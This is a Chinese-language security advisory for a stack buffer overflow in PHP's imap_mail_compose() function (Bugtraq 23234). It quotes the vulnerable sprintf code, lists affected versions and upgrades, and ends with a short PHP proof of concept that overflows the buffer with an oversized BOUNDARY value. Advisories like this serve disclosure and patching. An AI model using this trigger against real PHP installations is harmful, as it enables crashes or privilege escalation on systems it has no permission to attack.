BUGTRAQ ID: 23234
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的imap_mail_compose()函数实现上存在缓冲区溢出漏洞,本地攻击者可能利用此漏洞提升权限。
imap_mail_compose()函数在名为tmp的栈缓冲区中创建固定大小的多部邮件:
PHP_FUNCTION(imap_mail_compose)
{
…
char tmp[8 * MAILTMPLEN], *mystring=NULL, *t=NULL, *tempstring=NULL;
在创建多部消息时首先要从输入参数中读取BOUNDARY,然后未经任何大小检查便使用sprintf调用将输入参数拷贝到了栈缓冲区:
if (bod && bod->type == TYPEMULTIPART) {
/* first body part */
part = bod->nested.part;
/* find cookie */
for (param = bod->parameter; param && !cookie; param = param->next) {
if (!strcmp (param->attribute, "BOUNDARY")) {
cookie = param->value;
}
}
/* yucky default */
if (!cookie) {
cookie = "-";
}
/* for each part */
do {
t=tmp;
/* build cookie */
sprintf (t, "--%s%s", cookie, CRLF);
这允许覆盖缓冲区,导致执行任意指令。
PHP PHP 5.1.6
PHP PHP 5.1.5
PHP PHP 5.1.4
PHP PHP 5.1.3
PHP PHP 5.1.3
PHP PHP 5.1.2
PHP PHP 5.1.1
PHP PHP 5.1
PHP PHP 5.0.5
PHP PHP 5.0.4
PHP PHP 5.0.3
升级到最新程序:
PHP PHP 5.2
* PHP PHP 5.2.1
<a href="http://www.php.net/downloads.php#v5" target="_blank">http://www.php.net/downloads.php#v5</a>
PHP PHP 4.4.4
* PHP PHP 4.4.5
<a href="http://www.php.net/downloads.php#v4" target="_blank">http://www.php.net/downloads.php#v4</a>
<?php
$envelope["from"]= "[email protected]";
$envelope["to"] = "[email protected]";
$part1["type"] = TYPEMULTIPART;
$part1["subtype"] = "mixed";
$part1["type.parameters"] = array("BOUNDARY" => str_repeat("A",8192));
$part2["type"] = TYPETEXT;
$part2["subtype"] = "plain";
$part2["description"] = "description3";
$part2["contents.data"] = "contents.data3\n\n\n\t";
$body[1] = $part1;
$body[2] = $part2;
imap_mail_compose($envelope, $body);
?>